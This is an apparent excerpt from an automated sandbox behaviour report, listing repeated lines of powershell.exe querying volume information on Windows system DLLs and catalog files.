Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
